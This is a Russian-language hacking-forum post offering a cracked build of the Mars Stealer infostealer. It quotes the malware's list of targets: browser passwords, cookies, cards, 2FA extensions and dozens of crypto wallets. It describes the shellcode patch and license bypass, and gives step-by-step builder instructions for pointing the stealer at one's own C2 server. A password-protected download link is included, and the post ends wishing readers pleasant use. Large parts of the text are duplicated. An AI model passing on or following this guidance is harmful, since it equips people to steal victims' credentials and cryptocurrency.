Deku
Команда форума
- Регистрация
- 02.01.2020
- Сообщения
- 1 230
- Реакции
- 51
- Баллы
- 63
Коротко о стиллере (из официальной темы):
"Браузеры: Internet Explorer, Microsoft Edge
Google Chrome, Chromium, Microsoft Edge (Chromium version), Kometa, Amigo, Torch, Orbitum, Comodo Dragon, Nichrome, Maxthon5, Maxthon6, Sputnik Browser, Epic Privacy Browser, Vivaldi, CocCoc, Uran Browser, QIP Surf, Cent Browser, Elements Browser, TorBro Browser, CryptoTab Browser, Brave Browser.
Opera Stable, Opera GX, Opera Neon.
Firefox, SlimBrowser, PaleMoon, Waterfox, Cyberfox, BlackHawk, IceCat, KMeleon, Thunderbird.
Собирает пароли, куки, cc, автозаполнение, историю посещений сайтов, историю скачивания файлов.
Поддерживаются все последние обновления браузеров, включая Chrome v80.
2FA-плагины:
Authenticator, Authy, EOS Authenticator, GAuth Authenticator, Trezor Password Manager.
Крипто-плагины:
TronLink, MetaMask, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitAppWallet, iWallet, Wombat, MEW CX, Guild Wallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, Leaf Wallet, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay, Coin98 Wallet.
Кошельки: Bitcoin Core и все производные (Dogecoin, Zcash, DashCore, LiteCoin, и так далее), Ethereum, Electrum, Electrum LTC, Exodus, Electron Cash, MultiDoge, JAXX, Atomic, Binance, Coinomi.
Сбор данных о ПК: IP и страну, Рабочий путь до EXE-файла Mars в процессе работы, Локальное время на ПК и временную зону, Язык системы, Языковые раскладки клавиатуры, Ноутбук/Десктоп, Модель процессора, Размер установленной RAM, Версию операционной системы и её разрядность, Модель видеокарты, Имя компьютера, Имя пользователя, Имя домена компьютера (при его наличии), Machine ID, GUID, Список установленного в системе ПО и его версии"
Как видите - список огромный, разработчики постарались над сбором, но, увы, не над оптимизацией и защитой."
Проделанная работа:
* Сердце патча\кряка - шеллкод. Я написал шеллкод, который использует готовые функции расшифровки, выделил секцию, выделил память чтобы точно помещались зашифрованные IP любого размера, нопнул старую расшифровку, т.е фактически я заменил расшифровку старого IP с своим адресом, на расшифровку своего IP, по своему адресу, это потому, что в билде использовался короткий IP, и ему было выделено мало места, поэтому если вставить IP длиннее - он не влезет. Хотя, мне кажется, это необходимая мера - нельзя было предусмотреть сразу размеры для всех IP, легче выделить больше места, чтобы поместился любой.
* Для патча мне пришлось убить релоки, но ничего плохого не случилось
* Обезвредил проверку даты (т.е само сердце лицензии)
* Написал билдер, чтобы вам было удобно указывать свой IP и свой гейт.
Из минусов - у меня не было времени переписывать шифрование Base64 и RC4, поэтому я просто оставил вам кнопочку на сайт, где вы должны будете сами зашифровать, и вставить в настройки.
И введённый домен:
Скачать:
https://anonfiles.com/nbPfa6E4ue/LLCPPC_zip Пароль: LLCPPC
https://www.virustotal.com/gui/file...a6b9c1f159da5769853a6eb20e2d3d542d7/detection
Инструкция по установке панели - внутри.
Вскоре сделаю программную зашифровку, чтобы не бегать на сайт...
Важно: библиотеки в панели должны оставаться на своём месте - /public/*.dll, т.к пока что нет возможности изменять пути к библиотекам.
Так же - нет возможности изменить путь скачивания, поэтому скачиваются библиотеки в C:\ProgramData. Хотя у меня подозрение, что разработчик и сам не давал это изменить покупателям, смотря на то, что каждый билд скачивает библиотеки по одному и тому же пути, как в панели, так и на ПК жертвы...
Приятного использования.
В поисках человека, который готов дать билд v4, и её панель - на патч, естественно
"Браузеры: Internet Explorer, Microsoft Edge
Google Chrome, Chromium, Microsoft Edge (Chromium version), Kometa, Amigo, Torch, Orbitum, Comodo Dragon, Nichrome, Maxthon5, Maxthon6, Sputnik Browser, Epic Privacy Browser, Vivaldi, CocCoc, Uran Browser, QIP Surf, Cent Browser, Elements Browser, TorBro Browser, CryptoTab Browser, Brave Browser.
Opera Stable, Opera GX, Opera Neon.
Firefox, SlimBrowser, PaleMoon, Waterfox, Cyberfox, BlackHawk, IceCat, KMeleon, Thunderbird.
Собирает пароли, куки, cc, автозаполнение, историю посещений сайтов, историю скачивания файлов.
Поддерживаются все последние обновления браузеров, включая Chrome v80.
2FA-плагины:
Authenticator, Authy, EOS Authenticator, GAuth Authenticator, Trezor Password Manager.
Крипто-плагины:
TronLink, MetaMask, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitAppWallet, iWallet, Wombat, MEW CX, Guild Wallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, Leaf Wallet, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay, Coin98 Wallet.
Кошельки: Bitcoin Core и все производные (Dogecoin, Zcash, DashCore, LiteCoin, и так далее), Ethereum, Electrum, Electrum LTC, Exodus, Electron Cash, MultiDoge, JAXX, Atomic, Binance, Coinomi.
Сбор данных о ПК: IP и страну, Рабочий путь до EXE-файла Mars в процессе работы, Локальное время на ПК и временную зону, Язык системы, Языковые раскладки клавиатуры, Ноутбук/Десктоп, Модель процессора, Размер установленной RAM, Версию операционной системы и её разрядность, Модель видеокарты, Имя компьютера, Имя пользователя, Имя домена компьютера (при его наличии), Machine ID, GUID, Список установленного в системе ПО и его версии"
Как видите - список огромный, разработчики постарались над сбором, но, увы, не над оптимизацией и защитой."
Проделанная работа:
* Сердце патча\кряка - шеллкод. Я написал шеллкод, который использует готовые функции расшифровки, выделил секцию, выделил память чтобы точно помещались зашифрованные IP любого размера, нопнул старую расшифровку, т.е фактически я заменил расшифровку старого IP с своим адресом, на расшифровку своего IP, по своему адресу, это потому, что в билде использовался короткий IP, и ему было выделено мало места, поэтому если вставить IP длиннее - он не влезет. Хотя, мне кажется, это необходимая мера - нельзя было предусмотреть сразу размеры для всех IP, легче выделить больше места, чтобы поместился любой.
* Для патча мне пришлось убить релоки, но ничего плохого не случилось
* Обезвредил проверку даты (т.е само сердце лицензии)
* Написал билдер, чтобы вам было удобно указывать свой IP и свой гейт.
Из минусов - у меня не было времени переписывать шифрование Base64 и RC4, поэтому я просто оставил вам кнопочку на сайт, где вы должны будете сами зашифровать, и вставить в настройки.
Установил панель. Как сделать билд?
- Копируете готовый ключ из билдера, заходите на сайт, вставляете его в поле "secret":
-
- Вводите, собственно, свой IP, тыкаете "Encrypt string" и получаете уже готовый результат Base64(RC4):
-
- Тоже самое проделываете с гейт. Писать нужно с палочкой в начале - /mygate.php
-
- Тыкаете "Set host", "Set gate", файл в папке - "Mars_Stealer_cracked_by_LLCPPC.exe" - копируете, и используете. Очень важно, именно скопировать, потому что этот файл должен лежать с билдером, и с точно таким же названием без него - следующий билд не получится сделать
И введённый домен:
Скачать:
https://anonfiles.com/nbPfa6E4ue/LLCPPC_zip Пароль: LLCPPC
https://www.virustotal.com/gui/file...a6b9c1f159da5769853a6eb20e2d3d542d7/detection
Инструкция по установке панели - внутри.
Вскоре сделаю программную зашифровку, чтобы не бегать на сайт...
Важно: библиотеки в панели должны оставаться на своём месте - /public/*.dll, т.к пока что нет возможности изменять пути к библиотекам.
Так же - нет возможности изменить путь скачивания, поэтому скачиваются библиотеки в C:\ProgramData. Хотя у меня подозрение, что разработчик и сам не давал это изменить покупателям, смотря на то, что каждый билд скачивает библиотеки по одному и тому же пути, как в панели, так и на ПК жертвы...
Приятного использования.
В поисках человека, который готов дать билд v4, и её панель - на патч, естественно